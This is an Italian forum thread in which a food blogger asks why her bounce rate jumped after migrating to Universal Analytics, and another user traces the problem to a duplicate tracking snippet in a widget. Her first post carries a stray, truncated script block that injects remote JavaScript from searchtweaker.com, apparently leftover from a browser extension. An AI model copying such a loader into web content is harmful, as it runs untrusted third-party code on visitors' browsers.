188 utenti online in questo momento
188 utenti online in questo momento
Guidami
star_border
Rispondere

impostazione proprietà di analytics per sito con redirect

Matricola ✭ ✭

Buongiorno, siccome da quando ho istallato universal analytics ho avuto un aumento sconsiderato della bounce rate, mi chiedevo se magari non fosse perchè ho sbagliato a ipostare la proprietà: io ho un dominio acquistato su aruba www.trattoriadamartina.com che fa un redirect su www.trattoriadamartina.blogspot.com. Mi sapete dire come devo impostare i parametri della proprietà? Attualmente spno così, sono corretti?

Inoltre mi chiedevo se una sbagliata impostazione della proprietà può essere la causa della'umento del bounce rate. non sto parlando di un piccolo aumento. Sono passata da un 22-23% al 79%. Sto impazzendo per cercare di capire cosa può essere successo perchè il calo è stato netto e improvviso a partire proprio dal giorno in cui si è completato il passaggio da google analytics a universal.

Analytics.PNG

Se può essere utile a individuare il problema, vi metto anch eun'analisi comparativa dle prima e del dopo passaggio:

rapporto.PNG

Come vedete la frequenza di rimbalzo è aumentata del 230% e inoltre ho avuto un calo pazzesco anche delel visualizzazioni di pagina. Siccome ho un blog di cucina e non ho fatto cambiamenti che possano giustificareun tale crollo, mi chiedo cosa possa essere successo. Mi aiutate a venirne fuori? Vorrei proprio riuscire  acapire perchè sto per iniziare una collaborazione in cui mi pagheranno a visualizzazioni di pagina e fino a poco fa ne avevo 350.000 e mi ero prospetatta un certo guadagno, mentre ora ne ho, se va bene, la metà

<script id="FoxLingoJs" type="text/javascript">// (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(... (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); // </script>

Rif.: impostazione proprietà di analytics per sito con redirect

Matricola ✭ ✭
Ehi, nessuno mi sa aiutare???

Laureato ✭ ✭ ✭

Dal tuo screenshot il nome della proprietá puoi mettere qualsiasi titulo, non é importante se non hai altre proprietá create, la url é corretta.
L'unica cosa che vedo é che ci sono due snippet di Analytics, uno principale dove appunto si riferisce alla proprietá UA-17xxxx pero c'è un altro in un widget. Prova ad eliminarlo e prova dopo 48h si il bounce rate rtorna ai valori precedenti.

Se non hai toccato gli altri parametri, la sessione si chiude dopo 30 minuti come prima.

Script source
http://widget.ricercadiricette.it/blogcounter.js?blog_id=G3VlV&timestamp=1403042400
Tracked page
trattoriadamartina.com/

Matricola ✭ ✭
Marco, il widget di cui parli in realtà è un aggregatore di ricette. A questo punto penso che loro l'abbiano inserito di default perchè contano le ricette che ho poastato da quando ho inserito il blog nel loro portale. Ma non credo che il problema sia contestuale a quello, perchè quel widget ce l'ho da prima che si presentasse il problema

Matricola ✭ ✭
Se può essere utile posso abilitare la possibilità per voi di controllare i parametri di analytics, poi magari ne parliamo in privato

Laureato ✭ ✭ ✭
io questo nel secondo snippet, cioé quello del widget:
_gaq.push(['_setAccount', 'UA-24293242-31']);
_gaq.push(['_setDomainName', 'trattoriadamartina.com']);
_gaq.push(['_setAllowLinker', true]);
_gaq.push(['_setAllowHash', false]);
_gaq.push(['_trackPageview', 'trattoriadamartina.com/' + document.location.href.replace(/[^:]+:\/\/[^\/]+\//gi, '')]);
}

Credo che algo passa qui.
Hai provato a segmentare le visite per dispositivi mobile e desktop per il suo bounce rate e confrontare se l'aumento c'è stato in uno dei due, o in entrambi?

Matricola ✭ ✭
E' possibile chequel portale, ricerca di ricette abbia inserito il suo rilevatore analytics in modo da convogliare i dati del mio sul suo rapporto? Nel caso mi tolgo da quel portale e via, solo che mi portava un po' di visite.
Qualcehe giorno fa avevo provato ad analizare i dati e in efeftti avevo visto che la frequenza di rimbalzo, nonchè il calo di pagine viste per sessione è schizzato alle stelle, ma solo per i rapporti desktop e non per quelli da mobile. Cosa può significare?

Laureato ✭ ✭ ✭
Prova a togliere lo slash finale dall'url della proprietá...
Quando parli "da quache giorno fa"...coincide con il cambio che effettuasti da blogspot, cioé quando hai inserito il dominio comprato?

Matricola ✭ ✭
No, il crollo c'è stato contestualmente a quando ho fatto il passaggio da google analytics classic a google universal...Nello specifico il giorno 20 maggio. Prva a vedere lo screenshot sopra. Adesso tolgo anche lo slash di cui parli...